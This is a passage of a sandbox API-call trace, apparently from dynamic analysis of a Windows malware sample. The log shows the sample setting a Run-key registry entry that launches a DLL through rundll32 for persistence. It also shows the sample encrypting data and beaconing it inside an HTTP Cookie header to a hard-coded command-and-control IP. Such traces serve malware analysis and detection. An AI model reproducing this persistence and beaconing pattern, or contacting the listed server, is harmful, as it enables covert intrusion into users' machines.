cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0292.275] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0292.275] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0292.275] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0292.275] GetProcessHeap () returned 0x530000 [0292.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0292.275] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0292.275] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0292.277] GetProcessHeap () returned 0x530000 [0292.277] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c750 [0292.277] GetProcessHeap () returned 0x530000 [0292.277] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0292.277] GetProcessHeap () returned 0x530000 [0292.278] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0292.278] GetProcessHeap () returned 0x530000 [0292.278] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e6360 | out: hHeap=0x530000) returned 1 [0292.278] GetProcessHeap () returned 0x530000 [0292.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0292.279] GetProcessHeap () returned 0x530000 [0292.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0292.279] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0292.279] GetProcessHeap () returned 0x530000 [0292.279] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83960 [0292.279] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FPJFkmXYcTJq") returned 102 [0292.279] GetProcessHeap () returned 0x530000 [0292.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83960 | out: hHeap=0x530000) returned 1 [0292.279] GetProcessHeap () returned 0x530000 [0292.279] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0292.279] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0292.280] GetProcessHeap () returned 0x530000 [0292.280] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0292.280] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FPJFkmXYcTJq") returned 102 [0292.280] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FPJFkmXYcTJq", cbData=0xce | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",FPJFkmXYcTJq") returned 0x0 [0292.280] RegCloseKey (hKey=0x670) returned 0x0 [0292.281] GetProcessHeap () returned 0x530000 [0292.281] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c750 | out: hHeap=0x530000) returned 1 [0292.281] GetProcessHeap () returned 0x530000 [0292.281] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0292.281] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe7be8) returned 0x102 [0302.495] GetProcessHeap () returned 0x530000 [0302.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0302.496] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0302.496] GetProcessHeap () returned 0x530000 [0302.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0302.496] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0302.496] GetProcessHeap () returned 0x530000 [0302.496] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0302.496] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0302.496] GetProcessHeap () returned 0x530000 [0302.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0302.496] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83960 [0302.501] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0302.501] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0302.501] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0302.501] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0302.501] FindNextFileW (in: hFindFile=0x2a83960, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0302.501] FindClose (in: hFindFile=0x2a83960 | out: hFindFile=0x2a83960) returned 1 [0302.502] GetProcessHeap () returned 0x530000 [0302.502] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0302.502] GetProcessHeap () returned 0x530000 [0302.502] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0302.502] GetProcessHeap () returned 0x530000 [0302.502] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0302.502] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0304.804] GetProcessHeap () returned 0x530000 [0304.804] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0304.804] GetProcessHeap () returned 0x530000 [0304.805] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0304.805] GetProcessHeap () returned 0x530000 [0304.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0304.805] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0304.805] GetProcessHeap () returned 0x530000 [0304.805] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0304.805] GetProcessHeap () returned 0x530000 [0304.805] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0304.805] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0304.805] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0304.805] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0304.805] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0304.805] GetProcessHeap () returned 0x530000 [0304.806] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0304.806] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0304.806] GetProcessHeap () returned 0x530000 [0304.806] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf98 [0304.806] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0304.806] GetProcessHeap () returned 0x530000 [0304.806] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bdf8 [0304.806] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf98, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bdf8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bdf8, pcbResult=0x2cf4b4) returned 0x0 [0304.806] GetProcessHeap () returned 0x530000 [0304.806] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf8) returned 0x5e2970 [0304.806] GetProcessHeap () returned 0x530000 [0304.806] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bdf8 | out: hHeap=0x530000) returned 1 [0304.807] GetProcessHeap () returned 0x530000 [0304.807] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0304.807] CryptBinaryToStringW (in: pbBinary=0x5e2970, cbBinary=0xf8, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0304.807] GetProcessHeap () returned 0x530000 [0304.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x29a) returned 0x2b65430 [0304.807] CryptBinaryToStringW (in: pbBinary=0x5e2970, cbBinary=0xf8, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToUBLVzaMP3DLwkAhGB/jRrEWOXpDUPQjtQo+y8cBEuyJEc9Kfp2DkDR6AieQWmoGjSkn29CGz3DUEAiY/vPhv/FwXhO4rU/dGhdfmPIsPatDWvj8z3gZZk=", pcchString=0x2cf504) returned 1 [0304.807] GetProcessHeap () returned 0x530000 [0304.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0304.807] GetProcessHeap () returned 0x530000 [0304.807] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f40 [0304.807] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: PjdXtudc=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToUBLVzaMP3DLwkAhGB/jRrEWOXpDUPQjtQo+y8cBEuyJEc9Kfp2DkDR6AieQWmoGjSkn29CGz3DUEAiY/vPhv/FwXhO4rU/dGhdfmPIsPatDWvj8z3gZZk=\r\n") returned 351 [0304.807] GetProcessHeap () returned 0x530000 [0304.808] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f40 | out: hHeap=0x530000) returned 1 [0304.808] GetProcessHeap () returned 0x530000 [0304.808] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0304.808] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0304.809] GetProcessHeap () returned 0x530000 [0304.809] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0304.809] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0304.812] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="TxNbeAQdUfkbUXFUXVRqjVQtoKYHhMYdO", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0304.813] GetProcessHeap () returned 0x530000 [0304.813] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0304.813] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0304.813] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0304.813] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0304.814] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: PjdXtudc=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePToUBLVzaMP3DLwkAhGB/jRrEWOXpDUPQjtQo+y8cBEuyJEc9Kfp2DkDR6AieQWmoGjSkn29CGz3DUEAiY/vPhv/FwXhO4rU/dGhdfmPIsPatDWvj8z3gZZk=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0306.023] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0306.024] GetProcessHeap () returned 0x530000 [0306.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0306.024] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x24a) returned 1 [0306.024] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4804a, dwNumberOfBytesToRead=0xfdb6, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4804a*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0306.024] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0306.024] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0306.024] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0306.024] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0306.025] GetProcessHeap () returned 0x530000 [0306.025] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0306.025] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bf98, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bf98, pcbResult=0x2cf51c) returned 0x0 [0306.025] GetProcessHeap () returned 0x530000 [0306.025] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0306.025] GetProcessHeap () returned 0x530000 [0306.025] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0306.025] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0306.025] GetProcessHeap () returned 0x530000 [0306.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0306.025] GetProcessHeap () returned 0x530000 [0306.026] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0306.026] GetProcessHeap () returned 0x530000 [0306.026] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0306.026] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0306.026] GetProcessHeap () returned 0x530000 [0306.026] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0306.027] GetProcessHeap () returned 0x530000 [0306.027] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0306.027] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0306.027] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x58bfe0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0306.027] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0306.027] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0306.027] GetProcessHeap () returned 0x530000 [0306.027] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0306.027] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0306.027] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x58bf9c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0306.029] GetProcessHeap () returned 0x530000 [0306.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0306.030] GetProcessHeap () returned 0x530000 [0306.030] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0306.030] GetProcessHeap () returned 0x530000 [0306.031] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0306.031] GetProcessHeap () returned 0x530000 [0306.032] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e2970 | out: hHeap=0x530000) returned 1 [0306.032] GetProcessHeap () returned 0x530000 [0306.032] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0306.032] GetProcessHeap () returned 0x530000 [0306.032] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0306.032] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0306.033] GetProcessHeap () returned 0x530000 [0306.033] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0306.033] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wbktQowAvaiv") returned 102 [0306.033] GetProcessHeap () returned 0x530000 [0306.033] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0306.033] GetProcessHeap () returned 0x530000 [0306.033] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0306.033] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x630, lpdwDisposition=0x0) returned 0x0 [0306.034] GetProcessHeap () returned 0x530000 [0306.034] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0306.034] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wbktQowAvaiv") returned 102 [0306.034] RegSetValueExW (in: hKey=0x630, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wbktQowAvaiv", cbData=0xce | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",wbktQowAvaiv") returned 0x0 [0306.035] RegCloseKey (hKey=0x630) returned 0x0 [0306.035] GetProcessHeap () returned 0x530000 [0306.035] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0306.035] GetProcessHeap () returned 0x530000 [0306.036] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0306.036] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe9454) returned 0x102 [0316.216] GetProcessHeap () returned 0x530000 [0316.216] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0316.216] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0316.216] GetProcessHeap () returned 0x530000 [0316.216] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0316.216] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0316.216] GetProcessHeap () returned 0x530000 [0316.216] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd71b8 [0316.216] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0316.216] GetProcessHeap () returned 0x530000 [0316.216] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd71b8 | out: hHeap=0x530000) returned 1 [0316.217] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0316.218] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, 